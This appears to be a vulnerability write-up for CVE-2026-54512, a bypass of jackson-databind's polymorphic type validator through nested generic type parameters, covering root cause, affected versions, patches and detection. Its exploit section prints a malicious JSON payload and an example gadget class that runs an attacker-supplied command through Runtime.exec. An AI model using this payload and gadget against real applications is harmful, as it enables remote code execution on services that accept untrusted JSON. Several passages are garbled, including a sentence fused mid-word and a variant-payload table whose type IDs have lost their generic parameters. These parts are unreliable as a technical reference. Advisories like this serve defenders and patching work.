Listen to this Post
How CVE-2026-54512 Works
Jackson-databind’s `PolymorphicTypeValidator` (PTV) is the primary safety mechanism guarding polymorphic deserialization. When polymorphic typing is enabled and a type identifier contains generic parameters (i.e., the type ID string contains <), `DatabindContext._resolveAndValidateGeneric()` validates only the raw container class name (the substring before <) against the configured PTV.
If the container type is approved, the method parses the full canonical type string via `TypeFactory.constructFromCanonical()` and returns the fully parameterized type—without ever validating the nested type arguments against the PTV. The nested type arguments are then resolved, instantiated, and populated as beans during deserialization.
An attacker who controls the type ID can therefore place a denied class as a generic type parameter of an allowed container—for example, `java.util.ArrayListClass.forName(name, true, loader), instantiated, and its properties are set from attacker-controlled JSON. This completely bypasses an explicitly configured PTV allow-list.
This is the same vulnerability class responsible for the historical sequence of jackson-databind deserialization CVEs; here it manifests as a validator bypass rather than a missing deny-list entry. The vulnerability affects versions from 2.10.0 (when PTV was introduced) up to, but not including, the fixed versions.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | FasterXML jackson-databind |
| Version | 2.10.0 – 2.18.7, 2.19.0 – 2.21.3, 3.0.0 – 3.1.3 |
| Vulnerability | PTV generic parameter bypass |
| Severity | High (CVSS 8.1) |
| Date | June 23, 2026 |
| Prediction | Patch already released (2.18.8 / 2.21.4 / 3.1.4) |
What Undercode Say: Analytics
Vulnerable Configuration Example:
BasicPolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
.allowIfSubType("java.util.ArrayList")
.build();
ObjectMapper mapper = JsonMapper.builder()
.polymorphicTypeValidator(ptv)
.build();
Malicious Payload (Wrapper.value is Object with @JsonTypeInfo):
{"value":["java.util.ArrayList<com.evil.EvilGadget>",[{"cmd":"calc.exe"}]]}
Variant Payloads (all bypass ArrayList/HashMap allow-list):
| Type ID | Smuggled Type Position |
||-|
| `java.util.ArrayList` | list element |
| `java.util.HashMap` | map key |
| `java.util.HashMap` | map value |
| `java.util.ArrayList>` | nested element |
| `java.util.ArrayList` | array element |
Root Cause Analysis:
– `_resolveAndValidateGeneric()` → validates only raw container (before <)
– `TypeFactory.constructFromCanonical()` → returns full parameterized type
– Nested type arguments → never validated against PTV
– `Class.forName(name, true, loader)` → loads and instantiates smuggled class
Exploit
Attack Prerequisites:
1. Application accepts untrusted JSON
- Polymorphic typing is enabled (via `@JsonTypeInfo` or default typing)
- A PTV is configured with an allow-list (e.g.,
java.util.ArrayList) - A gadget class (e.g., JNDI, TemplatesImpl, JDBC connection-pool) is present on the classpath
Exploit Chain:
1. Attacker crafts JSON with type ID: `java.util.ArrayList`
2. PTV approves `java.util.ArrayList` (raw container)
3. Nested `com.evil.Gadget` bypasses PTV validation entirely
4. `Class.forName()` loads the gadget class
5. Attacker-controlled JSON properties are injected via setters/fields
- Gadget’s side effects trigger (JNDI lookup, RCE, etc.)
Example Gadget Class:
package com.evil;
public class EvilGadget {
private String cmd;
public void setCmd(String cmd) throws Exception {
Runtime.getRuntime().exec(cmd);
}
}
Protection
Immediate Actions:
- Upgrade to patched versions:
– `2.18.8` or later
– `2.21.4` or later
– `3.1.4` or later
If Upgrade Is Not Possible:
- Disable polymorphic typing entirely if not required
- Avoid deserializing untrusted JSON
- Use `@JsonTypeInfo(use = Id.NAME)` with explicit subtypes instead of `Id.CLASS`
Patch Details:
The fix (commit 434d6c511) adds recursive validation of each non-trivial type parameter (and array element types appearing as parameters) through the full PTV chain, with documented exemptions for `Object` (wildcard resolution) and `Enum` types.
Detection:
- Search for `ObjectMapper` instances with `polymorphicTypeValidator()` configured
- Audit `@JsonTypeInfo(use = Id.CLASS)` usage
- Check for `activateDefaultTyping()` calls with PTV
Impact
- Bypass of the PTV allow-list, including the recommended `BasicPolymorphicTypeValidator` configured with name-prefix allow rules
- Arbitrary class instantiation of any type assignable to the container’s element/parameter position, with attacker-controlled property values (setter/field injection)
- Potential unauthenticated remote code execution when a class with exploitable side effects (JNDI lookup, JDBC/connection-pool gadgets,
TemplatesImpl-style loaders, etc.) is present on the classpath - Applications that accept untrusted JSON and rely on a configured PTV—the documented, security-conscious configuration—are affected
Affected Component: Maven `com.fasterxml.jackson.core:jackson-databind`
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
